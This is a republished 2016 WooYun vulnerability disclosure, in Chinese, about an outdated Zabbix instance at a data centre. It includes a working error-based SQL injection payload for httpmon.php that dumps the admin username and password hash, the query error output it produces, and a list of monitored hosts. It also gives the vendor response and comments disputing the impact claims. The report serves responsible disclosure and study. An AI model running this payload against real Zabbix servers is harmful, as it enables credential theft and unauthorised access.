某IDC zabbix版本过低存在SQL注入可威胁70台服务器包括4399/37wan等企业

admin
admin
admin
140692
文章
117
评论
2017年5月1日15:35:29评论400 views字数 270阅读0分54秒阅读模式
摘要

2016-03-09: 细节已通知厂商并且等待厂商处理中
2016-03-11: 厂商已经确认,细节仅向厂商公开
2016-03-21: 细节向核心白帽子及相关领域专家公开
2016-03-31: 细节向普通白帽子公开
2016-04-10: 细节向实习白帽子公开
2016-04-25: 细节向公众公开

漏洞概要 关注数(12) 关注此漏洞

缺陷编号: WooYun-2016-182592

漏洞标题: 某IDC zabbix版本过低存在SQL注入可威胁70台服务器包括4399/37wan等企业

相关厂商: cncert国家互联网应急中心

漏洞作者: cwkiller

提交时间: 2016-03-09 21:30

公开时间: 2016-04-25 19:44

漏洞类型: 系统/服务补丁不及时

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2016-03-09: 细节已通知厂商并且等待厂商处理中
2016-03-11: 厂商已经确认,细节仅向厂商公开
2016-03-21: 细节向核心白帽子及相关领域专家公开
2016-03-31: 细节向普通白帽子公开
2016-04-10: 细节向实习白帽子公开
2016-04-25: 细节向公众公开

简要描述:

rt

详细说明:

**.**.**.**/zabbix 用guest登陆

**.**.**.**/zabbix/httpmon.php?applications=2此处存在注入

构造注入语句

code 区域 
and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

爆出admin的md5值

code 区域 
Error in query [INSERT INTO profiles (profileid, userid, idx, value_id, type) VALUES (1226, 2, 'web.httpmon.applications', 2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a), 1)] [Duplicate entry 'Admin~c430613dfdaa9b2f6dae5027313bd58f~~1' for key 1]

得到md5 c430613dfdaa9b2f6dae5027313bd58f

但是解密不了。。。。

但是看了一下控制了70台服务器,危害还是很大的所以提交了

code 区域 
上望机房_5/1_S5328_1 - - - 1
 上望机房_S9312_IDC_A - - - 1
 兆维BGP_**.**.**.** - - - 1
 北京万兆A - - - 1
 北京万兆B - - - 1
 墨麟-电信 - - - 1
 安阳机房_3/7A-S3100-1G - - - 1
 安阳机房_5/2A-S3100-1G - - - 1
 安阳机房_5/6A-S5328-10G - - - 1
 安阳机房_5/10A-S5024-1G - - - 1
 无锡国际s5328 - - - 1
 晨路金华-**.**.**.** - - - 1
 综合楼37玩 - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 9-2-fanghuoqiang-**.**.**.** - - - 1
 27net-254.121 - - - 0
 37wan-**.**.**.** - - - 1
 4399北京电信_**.**.**.** 0 % 1 % 0.03 % -
 BJ-BGP-**.**.**.** - - - 1
 BJ-BGP-**.**.**.** - - - 1
 cacti-238.58 - - - 1
 dh7609-**.**.**.** - - - 1
 dh9306-**.**.**.** - - - 1
 jh-ucloud-78.1 - - - 1
 jh-ucloud-92.1 - - - 1
 jh-ucloud-207.1 - - - 1
 jh-ucloud-bj-test1 - - - 1
 jh-ucloud-ping - - - 1
 jhcnc-6F-O1-s3560-ip2 - - - 1
 jhdx-7f-1-16-S3560G - - - 1
 jhdx-7f-2-1-S3750G - - - 1
 jhdx-7f-4-1-A - - - 1
 jhdx-7f-4-1-B - - - 1
 jhdx-7f-4-10-S3560G - - - 1
 jhdx-7f-9-2-S3560G - - - 1
 jhdx-7f-9-2-S3700-A - - - 1
 jhdx-7f-S9306-IDC-A - - - 1
 jhdx-7f-S9306-IDC-B - - - 1
 jhdx-7f-S9312-IDC-A - - - 1
 jhdx-7f-S9312-IDC-B - - - 1
 jhdx-8f-4-1-37WAN - - - 1
 jhdx-8f-5-1 - - - 1
 jhdx-8f-10-1-3750G - - - 1
 jhdx-8f-10-1-W5328 - - - 1
 jhdx-14-2-IP2 - - - 1
 jhdx-14-2-IP2-A - - - 1
 jhdx-14-2-IP2-B - - - 1
 jhdx-14-2-IP2-C - - - 1
 jhdx-old-7f-11-1-S5700-A - - - 1
 jhdx-old-7f-12-1-S5700-A - - - 1
 jhdx-old-7f-13-1-S5700-A - - - 1
 jhdx-old-7f-14-1-S5700-A - - - 1
 jhdx-old-7f-16-1-S5700-A - - - 1
 jhdx-old-7f-17-3-S3560G-4G-B - - - 1
 jhdx-old-7f-17-3-S3750-A - - - 1
 jhdx-old-7f-17-3-S5728-M1 - - - 1
 jhdx-old-7f-S9306-40G-trunk - - - 1
 jh_cmcc_H05_5700_EI - - - 1
 jh_cmcc_j9_5700AB - - - 1
 mdycloud_bgp_S5328

漏洞证明:

某IDC zabbix版本过低存在SQL注入可威胁70台服务器包括4399/37wan等企业

某IDC zabbix版本过低存在SQL注入可威胁70台服务器包括4399/37wan等企业

某IDC zabbix版本过低存在SQL注入可威胁70台服务器包括4399/37wan等企业

某IDC zabbix版本过低存在SQL注入可威胁70台服务器包括4399/37wan等企业

修复方案:

版权声明:转载请注明来源 cwkiller@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-03-11 19:44

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-13 14:18 | cwkiller ( 普通白帽子 | Rank:174 漏洞数:39 | 闭关修炼)

    1

    居然还可以伪造session。。。。。。。。

  2. 2016-03-30 14:01 | T-Safe ( 实习白帽子 | Rank:72 漏洞数:9 | 厦门冰眼信息科技安全研究院)

    1

    经过确认,人家zabbix上面就建立了个ping 4399和37wan的监控,所以不会影响这些东西,相当于本地打开cmd然后ping www.wooyun.org 接着截个图,写上影响乌云!这标题取得!!!!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin